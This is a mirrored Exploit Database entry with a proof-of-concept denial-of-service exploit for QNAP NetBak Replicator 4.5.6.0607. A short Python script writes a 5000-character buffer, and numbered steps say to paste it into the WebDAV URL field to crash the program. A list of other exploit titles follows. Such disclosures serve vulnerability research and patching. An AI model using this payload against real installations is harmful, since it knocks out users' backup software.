QNAP NetBak Replicator 4.5.6.0607 – Denial of Service (PoC)

Exploit Database
103 阅读

作者： Yair Rodríguez Aparicio

日期： 2018-10-30
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/45749/

# Exploit Title: QNAP NetBak Replicator 4.5.6.0607 Denial of Service (PoC)
# Date: 2018-10-29
# Exploit Author: Yair Rodríguez Aparicio
# Vendor Homepage: https://www.qnap.com/en/
# Software Link: https://www.qnap.com/en/download
# Version: 4.5.6.0607
# Tested on: Windows XP Profesional Español SP3 x86 

# Steps to Produce the Crash:
# 1.- Run python code : python qnap.py
# 2.- Open text.txt and copy content to clipboard
# 3.- Open NetBak Replicator.exe
# 4.- click on Restauración Instantánea
# 5.- Seleccione Origen -> "Ubicacion de red"
# 6.- click on "Dirección URL WebDAV"
# 7.- Paste ClipBoard on "Dirección URL WebDAV"
# 8.- Click "Aceptar".
# 9.- Crashed!
 

 
buffer = "\x41" * 5000
f = open("text.txt", "w")
f.write(buffer)
f.close()

last Exploits
QNAP NetBak Replicator 4.5.6.0607 – Denial of Service (PoC)的更多信息

Microsoft Edge – Chakra Incorrectly Parses Object Patterns：
Oracle Java Runtime Environment – Heap Out-of-Bounds Read During TTF Font Rendering in AlternateSubstitutionSubtable::process：
QlikView 12.50.20000.0 – ‘FTP Server Address’ Denial of Service (PoC)：
NIMax 5.3.1f0 – ‘VISA Alias’ Denial of Service (PoC)：
Juke 4.0.2 – Denial of Service Multiple Files：
Folder Lock 7.7.9 – Denial of Service：
CuteFTP Mac 3.1 – Denial of Service (PoC)：
Quickzip 5.1.8.1 – Denial of Service：